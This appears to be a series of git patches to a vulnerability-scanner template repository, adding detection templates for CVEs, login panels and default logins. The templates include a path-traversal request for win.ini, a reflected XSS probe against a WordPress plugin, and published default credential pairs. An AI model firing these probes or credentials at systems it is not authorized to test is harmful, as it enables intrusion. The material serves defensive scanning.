+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 7.50
+ cve-id: CVE-2020-15050
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../../../../../../../../../../../windows/win.in"
+
+ matchers:
+ - type: word
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+ part: body
From 04767227cc0c87d70145fcd5e05799409aa45ac4 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 10:19:16 +0000
Subject: [PATCH 050/259] Auto Generated New Template Addition List [Mon Mar 7
10:19:16 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 69fc1c8a35..2e4fbaa088 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,2 +1,3 @@
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
+vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From 4266bdad252aa8eb9f6a2de006df1afd4a1625a5 Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 09:08:43 -0500
Subject: [PATCH 051/259] Spacing
---
cves/2021/CVE-2021-40868.yaml | 3 ++-
cves/2021/CVE-2021-40870.yaml | 2 +-
cves/2021/CVE-2021-40978.yaml | 2 +-
default-logins/apache/tomcat-default-login.yaml | 2 +-
default-logins/dell/emcecom-default-login.yaml | 2 +-
default-logins/dvwa/dvwa-default-login.yaml | 2 +-
default-logins/exacqvision/exacqvision-default-login.yaml | 2 +-
default-logins/flir/flir-default-login.yaml | 2 +-
default-logins/frps/frp-default-login.yaml | 2 +-
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
10 files changed, 11 insertions(+), 10 deletions(-)
diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml
index 681c7f8d84..8c04b9dcd5 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@@ -5,7 +5,8 @@ info:
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
- remediation: Upgrade to Cloudron 6.3 or higher.
+:q
+ remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-40868
diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml
index 71abc2a141..f8348f548b 100644
--- a/cves/2021/CVE-2021-40870.yaml
+++ b/cves/2021/CVE-2021-40870.yaml
@@ -1,7 +1,7 @@
id: CVE-2021-40870
info:
- name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
+ name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
author: pikpikcu
severity: critical
description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
index 157e96c654..d04f5ff2e6 100644
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -9,7 +9,7 @@ info:
- https://github.com/nisdn/CVE-2021-40978
- https://nvd.nist.gov/vuln/detail/CVE-2021-40978
tags: cve,cve2021,mkdocs,lfi
- description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
+ description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
diff --git a/default-logins/apache/tomcat-default-login.yaml b/default-logins/apache/tomcat-default-login.yaml
index 1f69e7a798..79fc207a12 100644
--- a/default-logins/apache/tomcat-default-login.yaml
+++ b/default-logins/apache/tomcat-default-login.yaml
@@ -2,7 +2,7 @@ id: tomcat-default-login
info:
name: ApahceTomcat Manager Default Login
author: pdteam
- description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
+ description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
severity: high
reference:
- https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
diff --git a/default-logins/dell/emcecom-default-login.yaml b/default-logins/dell/emcecom-default-login.yaml
index 702fcf9b62..1ad75f5e1f 100644
--- a/default-logins/dell/emcecom-default-login.yaml
+++ b/default-logins/dell/emcecom-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: Dell EMC ECOM Default Login
author: Techryptic (@Tech)
severity: high
- description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
+ description: Dell EMC ECOM default login information "(admin:#1Password)" was discovered.
remediation: To resolve this issue, perform a "remsys" and "addsys" with no other operations occurring (reference the appropriate SMI-S provider documentation) and specify the new password when re-adding the array. If there are issues performing the "addsys" operation, it is recommended to restart the management server on each SP.
reference: https://www.dell.com/support/kbdoc/en-za/000171270/vipr-controller-operation-denied-by-clariion-array-you-are-not-privileged-to-perform-the-requested-operation
tags: dell,emc,ecom,default-login
diff --git a/default-logins/dvwa/dvwa-default-login.yaml b/default-logins/dvwa/dvwa-default-login.yaml
index 4ade6498f5..d73d47e498 100644
--- a/default-logins/dvwa/dvwa-default-login.yaml
+++ b/default-logins/dvwa/dvwa-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: DVWA Default Login
author: pdteam
severity: critical
- description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
+ description: Damn Vulnerable Web App (DVWA) is a test application for security professionals. The hard coded credentials are part of a security testing scenario.
tags: dvwa,default-login
reference:
- https://opensourcelibs.com/lib/dvwa
diff --git a/default-logins/exacqvision/exacqvision-default-login.yaml b/default-logins/exacqvision/exacqvision-default-login.yaml
index fa13193ef8..f21f95842a 100644
--- a/default-logins/exacqvision/exacqvision-default-login.yaml
+++ b/default-logins/exacqvision/exacqvision-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: ExacqVision Default Login
author: ELSFA7110
severity: high
- description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
+ description: ExacqVision Web Service default login credentials (admin/admin256) were discovered.
tags: exacqvision,default-login
reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf
classification:
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 74645c8686..8ded74e2f8 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: Flir Default Login
author: pikpikcu
severity: medium
- description: Flir default login credentials (admin/admin) were discovered.
+ description: Flir default login credentials (admin/admin) were discovered.
reference:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
diff --git a/default-logins/frps/frp-default-login.yaml b/default-logins/frps/frp-default-login.yaml
index 86875c9a39..0402c27460 100644
--- a/default-logins/frps/frp-default-login.yaml
+++ b/default-logins/frps/frp-default-login.yaml
@@ -4,7 +4,7 @@ info:
name: FRP Default Login
author: pikpikcu
severity: high
- description: FRP default login credentials were discovered.
+ description: FRP default login credentials were discovered.
tags: frp,default-login
reference: https://github.com/fatedier/frp/issues/1840
classification:
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 199f3f00ae..1c7aad6898 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -4,7 +4,7 @@ info:
name: Gitlab Default Login
author: Suman_Kar,dwisiswant0
severity: high
- description: Gitlab default login credentials were discovered.
+ description: Gitlab default login credentials were discovered.
tags: gitlab,default-login
reference:
- https://twitter.com/0xmahmoudJo0/status/1467394090685943809
From c002e6c7d5cae3f5bf788d2c6095c72daa1c03be Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 09:13:57 -0500
Subject: [PATCH 052/259] Accidentally added a vim command
---
cves/2021/CVE-2021-40868.yaml | 1 -
1 file changed, 1 deletion(-)
diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml
index 8c04b9dcd5..ffe1fcb3e5 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@@ -5,7 +5,6 @@ info:
author: daffainfo
severity: medium
description: In Cloudron 6.2, the returnTo parameter on the login page is vulnerable to cross-site scripting.
-:q
remediation: Upgrade to Cloudron 6.3 or higher.
reference:
- https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
From d58cf407d90bd0fd11c8f9bf77e1bcd16607f9d0 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 10:36:19 -0500
Subject: [PATCH 053/259] Enhancement: cves/2021/CVE-2021-41293.yaml by mp
---
cves/2021/CVE-2021-41293.yaml | 7 +++++--
1 file changed, 5 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41293.yaml b/cves/2021/CVE-2021-41293.yaml
index 8a45fb3d51..ec610f0255 100644
--- a/cves/2021/CVE-2021-41293.yaml
+++ b/cves/2021/CVE-2021-41293.yaml
@@ -1,11 +1,12 @@
id: CVE-2021-41293
info:
- name: ECOA Building Automation System - LFD
+ name: ECOA Building Automation System - Local File Disclosure
author: 0x_Akoko
severity: high
- description: The BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
+ description: The ECOA BAS controller suffers from an arbitrary file disclosure vulnerability. Using the 'fname' POST parameter in viewlog.jsp, attackers can disclose arbitrary files on the affected device and disclose sensitive and system information.
reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41293
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5679.php
- https://www.twcert.org.tw/tw/cp-132-5129-7e623-1.html
tags: cve,cve2021,ecoa,lfi,disclosure
@@ -33,3 +34,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/07
From 3ed70c862788d163d75dbc2d5c8d322b2a4c33ed Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 10:43:02 -0500
Subject: [PATCH 054/259] Enhancement: cves/2021/CVE-2021-41349.yaml by mp
---
cves/2021/CVE-2021-41349.yaml | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml
index 225d1a6a33..a05acc45dc 100644
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@@ -1,12 +1,13 @@
id: CVE-2021-41349
info:
- name: Pre-Auth POST Based Reflected XSS in Microsoft Exchange
+ name: Pre-Auth POST Based Reflected Cross-Site Scripting in Microsoft Exchange
author: rootxharsh,iamnoooob
severity: medium
tags: cve,cve2021,xss,microsoft,exchange
- description: Microsoft Exchange Server Spoofing Vulnerability This CVE ID is unique from CVE-2021-42305.
+ description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. This CVE ID is unique from CVE-2021-42305.
reference:
+ - https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
- https://nvd.nist.gov/vuln/detail/CVE-2021-41349
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-41349
@@ -39,4 +40,6 @@ requests:
- type: status
status:
- - 500
\ No newline at end of file
+ - 500
+
+# Enhanced by mp on 2022/03/07
From 49623611cbeec409b12fd866f722aa4b27ab9543 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 10:46:28 -0500
Subject: [PATCH 055/259] Enhancement: cves/2021/CVE-2021-41381.yaml by mp
---
cves/2021/CVE-2021-41381.yaml | 4 +++-
1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-41381.yaml b/cves/2021/CVE-2021-41381.yaml
index ff9081fb62..7df1244e77 100644
--- a/cves/2021/CVE-2021-41381.yaml
+++ b/cves/2021/CVE-2021-41381.yaml
@@ -4,7 +4,7 @@ info:
name: Payara Micro Community 5.2021.6 Directory Traversal
author: pikpikcu
severity: medium
- description: Payara Micro Community 5.2021.6 and below allows Directory Traversal
+ description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
reference:
- https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
- https://nvd.nist.gov/vuln/detail/CVE-2021-41381
@@ -28,3 +28,5 @@ requests:
- "payara.security.openid.sessionScopedConfiguration=true"
condition: and
part: body
+
+# Enhanced by mp on 2022/03/07
From 78bcf4c56f530e3432bda6b8c6d656e8212ccd43 Mon Sep 17 00:00:00 2001
From: Davy Jones
Date: Mon, 7 Mar 2022 21:59:37 +0600
Subject: [PATCH 056/259] Added CMS Kentico Login Page Detection
---
exposed-panels/kentico-login.yaml | 24 ++++++++++++++++++++++++
1 file changed, 24 insertions(+)
create mode 100644 exposed-panels/kentico-login.yaml
diff --git a/exposed-panels/kentico-login.yaml b/exposed-panels/kentico-login.yaml
new file mode 100644
index 0000000000..0911e767d4
--- /dev/null
+++ b/exposed-panels/kentico-login.yaml
@@ -0,0 +1,24 @@
+id: Kentico-login
+
+info:
+ name: Kentico Login Page Detection
+ author: d4vy
+ severity: info
+ tags: panel, login, kentico
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/Admin/CMSAdministration.aspx"
+ - "{{BaseURL}}/CMSPages/logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'action="./logon.aspx?ReturnUrl=%2fAdmin%2fCMSAdministration.aspx"'
+
+ - type: status
+ status:
+ - 200
From 74a69107bb265a212a7f14a6d68a627622171729 Mon Sep 17 00:00:00 2001
From: edoardottt
Date: Mon, 7 Mar 2022 19:19:41 +0100
Subject: [PATCH 057/259] Add CVE-2022-0381
---
cves/2022/CVE-2022-0381.yaml | 32 ++++++++++++++++++++++++++++++++
1 file changed, 32 insertions(+)
create mode 100644 cves/2022/CVE-2022-0381.yaml
diff --git a/cves/2022/CVE-2022-0381.yaml b/cves/2022/CVE-2022-0381.yaml
new file mode 100644
index 0000000000..e4c75198fc
--- /dev/null
+++ b/cves/2022/CVE-2022-0381.yaml
@@ -0,0 +1,32 @@
+id: CVE-2022-0381
+
+info:
+ name: WordPress Plugin Embed Swagger 1.0.0 - Reflected XSS
+ author: edoardottt
+ severity: medium
+ description: The Embed Swagger WordPress plugin is vulnerable to Reflected Cross-Site Scripting due to insufficient escaping/sanitization and validation via the url parameter found in the ~/swagger-iframe.php file which allows attackers to inject arbitrary web scripts onto the page, in versions up to and including 1.0.0.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2022-0381
+ cwe-id: CWE-79
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-0381
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0381
+ tags: cve,cve2022,swagger,xss,wordpress
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/embed-swagger/swagger-iframe.php?url=xss://%22-alert(document.domain)-%22"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: body
+ words:
+ - "url: \"xss://\"-alert(document.domain)"
\ No newline at end of file
From 042d3eb4a4ef8b631852c4632f5896ab88fb6f17 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 13:40:20 -0500
Subject: [PATCH 058/259] Enhancement: cves/2021/CVE-2021-41349.yaml by mp
---
cves/2021/CVE-2021-41349.yaml | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml
index a05acc45dc..44aaad9bee 100644
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@@ -1,11 +1,11 @@
id: CVE-2021-41349
info:
- name: Pre-Auth POST Based Reflected Cross-Site Scripting in Microsoft Exchange
+ name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
author: rootxharsh,iamnoooob
severity: medium
tags: cve,cve2021,xss,microsoft,exchange
- description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. This CVE ID is unique from CVE-2021-42305.
+ description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
reference:
- https://www.microsoft.com/en-us/download/details.aspx?id=103643
- https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2021-41349
From 7f5de64a291aaba34fd0e548b16eadcc96ef010c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 13:41:37 -0500
Subject: [PATCH 059/259] Enhancement: cves/2021/CVE-2021-41467.yaml by mp
---
cves/2021/CVE-2021-41467.yaml | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml
index 67ba68c3a7..3bb1e8ed25 100644
--- a/cves/2021/CVE-2021-41467.yaml
+++ b/cves/2021/CVE-2021-41467.yaml
@@ -1,13 +1,13 @@
id: CVE-2021-41467
info:
- name: JustWriting - Reflected XSS
+ name: JustWriting - Reflected Cross-Site Scripting
author: madrobot
severity: medium
- description: Cross-site scripting (XSS) vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
+ description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
reference:
- https://github.com/hjue/JustWriting/issues/106
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41467
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41467
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
@@ -36,3 +36,5 @@ requests:
words:
- "text/html"
part: header
+
+# Enhanced by mp on 2022/03/07
From 138142bdba0738872959eb3ef654d2ca6556fb5e Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 13:45:31 -0500
Subject: [PATCH 060/259] Enhancement: cves/2021/CVE-2021-41648.yaml by mp
---
cves/2021/CVE-2021-41648.yaml | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml
index 58f28013b0..2708382c24 100644
--- a/cves/2021/CVE-2021-41648.yaml
+++ b/cves/2021/CVE-2021-41648.yaml
@@ -1,11 +1,14 @@
id: CVE-2021-41648
info:
- name: PuneethReddyHC online-shopping-system-advanced SQL Injection action.php
+ name: PuneethReddyHC action.php SQL Injection
author: daffainfo
severity: high
- description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input.
- reference: https://github.com/MobiusBinary/CVE-2021-41648
+ description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping through the /action.php prId parameter. Using a post request does not sanitize the user input.
+ reference:
+ - https://github.com/MobiusBinary/CVE-2021-41648
+ - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@@ -38,3 +41,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/07
From bcc094893a269c19056f2ef5af3ba3c98bdd57a2 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 14:02:44 -0500
Subject: [PATCH 061/259] Enhancement: cves/2021/CVE-2021-41649.yaml by mp
---
cves/2021/CVE-2021-41649.yaml | 11 ++++++++---
1 file changed, 8 insertions(+), 3 deletions(-)
diff --git a/cves/2021/CVE-2021-41649.yaml b/cves/2021/CVE-2021-41649.yaml
index c25aafc9c0..238c3c1178 100644
--- a/cves/2021/CVE-2021-41649.yaml
+++ b/cves/2021/CVE-2021-41649.yaml
@@ -1,11 +1,14 @@
id: CVE-2021-41649
info:
- name: PuneethReddyHC online-shopping-system-advanced SQL Injection homeaction.php
+ name: PuneethReddyHC Online Shopping System homeaction.php SQL Injection
author: daffainfo
severity: critical
- description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
- reference: https://github.com/MobiusBinary/CVE-2021-41649
+ description: An unauthenticated SQL injection vulnerability exists in PuneethReddyHC Online Shopping System through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input.
+ reference:
+ - https://github.com/MobiusBinary/CVE-2021-41649
+ - https://awesomeopensource.com/project/PuneethReddyHC/online-shopping-system
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-41649
tags: cve,cve2021,sqli,injection
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
@@ -37,3 +40,5 @@ requests:
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/03/07
From aac30ad6efe8060ac9d3c26713fca2155a15156c Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 14:04:05 -0500
Subject: [PATCH 062/259] Enhancement: cves/2010/CVE-2010-1602.yaml by mp
---
cves/2010/CVE-2010-1602.yaml | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/cves/2010/CVE-2010-1602.yaml b/cves/2010/CVE-2010-1602.yaml
index 24c6ab5d3d..c4ba030f87 100644
--- a/cves/2010/CVE-2010-1602.yaml
+++ b/cves/2010/CVE-2010-1602.yaml
@@ -5,7 +5,6 @@ info:
author: daffainfo
severity: high
description: A directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.
- remediation: Upgrade to a supported version.
reference:
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
@@ -26,4 +25,4 @@ requests:
status:
- 200
-# Enhanced by mp on 2022/02/15
+# Enhanced by mp on 2022/03/07
From 81868f926d4413bd9b618cd04385e26b2e5c9142 Mon Sep 17 00:00:00 2001
From: MostInterestingBotInTheWorld
<98333686+MostInterestingBotInTheWorld@users.noreply.github.com>
Date: Mon, 7 Mar 2022 14:12:26 -0500
Subject: [PATCH 063/259] Enhancement: cves/2021/CVE-2021-4191.yaml by mp
---
cves/2021/CVE-2021-4191.yaml | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-4191.yaml b/cves/2021/CVE-2021-4191.yaml
index ece7be5fbf..39716563f3 100644
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@@ -4,10 +4,11 @@ info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
- description: A remote, unauthenticated attacker can use this vulnerability to collect registered GitLab usernames, names, and email addresses.
+ description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
+ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-4191
classification:
cvss-metrics: CVSS:5.3/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
@@ -47,3 +48,5 @@ requests:
- type: json
json:
- '.data.users.nodes[].username'
+
+# Enhanced by mp on 2022/03/07
From 2ebcbed6a341b6e6b89a5ca03b0c21c3285f507b Mon Sep 17 00:00:00 2001
From: sandeep
Date: Tue, 8 Mar 2022 00:49:41 +0530
Subject: [PATCH 064/259] additional matcher
---
cves/2022/CVE-2022-0381.yaml | 5 +++++
1 file changed, 5 insertions(+)
diff --git a/cves/2022/CVE-2022-0381.yaml b/cves/2022/CVE-2022-0381.yaml
index e4c75198fc..c467531f95 100644
--- a/cves/2022/CVE-2022-0381.yaml
+++ b/cves/2022/CVE-2022-0381.yaml
@@ -26,6 +26,11 @@ requests:
status:
- 200
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
- type: word
part: body
words:
From 967f6b85826e7d999a4bd643b67a924a043f89cd Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 14:20:30 -0500
Subject: [PATCH 065/259] YAML typo fixes
---
default-logins/flir/flir-default-login.yaml | 2 +-
default-logins/gitlab/gitlab-weak-login.yaml | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/default-logins/flir/flir-default-login.yaml b/default-logins/flir/flir-default-login.yaml
index 8ded74e2f8..befef88325 100644
--- a/default-logins/flir/flir-default-login.yaml
+++ b/default-logins/flir/flir-default-login.yaml
@@ -8,7 +8,7 @@ info:
reference:
- https://securitycamcenter.com/flir-default-password/
tags: default-login,flir,camera,iot
- classificaiton:
+ classification:
cwe-id: CWE-798
requests:
diff --git a/default-logins/gitlab/gitlab-weak-login.yaml b/default-logins/gitlab/gitlab-weak-login.yaml
index 1c7aad6898..b9e97461ce 100644
--- a/default-logins/gitlab/gitlab-weak-login.yaml
+++ b/default-logins/gitlab/gitlab-weak-login.yaml
@@ -11,7 +11,7 @@ info:
- https://git-scm.com/book/en/v2/Git-on-the-Server-GitLab
metadata:
shodan-query: http.title:"GitLab"
- classificaiton:
+ classification:
cwe-id: CWE-798
requests:
From ca555193ac492853d06d70def5fb1de0d2bac2cb Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Mon, 7 Mar 2022 19:21:30 +0000
Subject: [PATCH 066/259] Auto Generated New Template Addition List [Mon Mar 7
19:21:30 UTC 2022] :robot:
---
.new-additions | 1 +
1 file changed, 1 insertion(+)
diff --git a/.new-additions b/.new-additions
index 2e4fbaa088..c5d1d55c98 100644
--- a/.new-additions
+++ b/.new-additions
@@ -1,3 +1,4 @@
+cves/2022/CVE-2022-0381.yaml
cves/2022/CVE-2022-23779.yaml
default-logins/digitalrebar/digitalrebar-default-login.yaml
vulnerabilities/vmware/vrealize-operations-log4j-rce.yaml
From 2d0d48fdb713f03a26003202154ddd90bf35c7bf Mon Sep 17 00:00:00 2001
From: sullo
Date: Mon, 7 Mar 2022 14:26:37 -0500
Subject: [PATCH 067/259] Trailing space
---
cves/2021/CVE-2021-4191.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2021/CVE-2021-4191.yaml b/cves/2021/CVE-2021-4191.yaml
index 39716563f3..bccbb6ac4d 100644
--- a/cves/2021/CVE-2021-4191.yaml
+++ b/cves/2021/CVE-2021-4191.yaml
@@ -4,7 +4,7 @@ info:
name: GitLab GraphQL API User Enumeration
author: zsusac
severity: medium
- description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
+ description: An unauthenticated remote attacker can leverage this vulnerability to collect registered GitLab usernames, names, and email addresses.
reference:
- https://www.rapid7.com/blog/post/2022/03/03/cve-2021-4191-gitlab-graphql-api-user-enumeration-fixed/
- https://thehackernews.com/2022/03/new-security-vulnerability-affects.html
From 7032b928cc7117c8d1f623bd81c180520cb4f405 Mon Sep 17 00:00:00 2001
From: edoardottt
Date: Mon, 7 Mar 2022 20:47:40 +0100
Subject: [PATCH 068/259] Add CVE-2021-3002
---
cves/2021/CVE-2021-3002.yaml | 41 ++++++++++++++++++++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 cves/2021/CVE-2021-3002.yaml
diff --git a/cves/2021/CVE-2021-3002.yaml b/cves/2021/CVE-2021-3002.yaml
new file mode 100644
index 0000000000..573900166e
--- /dev/null
+++ b/cves/2021/CVE-2021-3002.yaml
@@ -0,0 +1,41 @@
+id: CVE-2021-3002
+
+info:
+ name: Seo Panel 4.8.0 - Post based Reflected XSS
+ author: edoardottt
+ severity: medium
+ description: Seo Panel 4.8.0 allows reflected XSS via the seo/seopanel/login.php?sec=forgot email parameter.
+ classification:
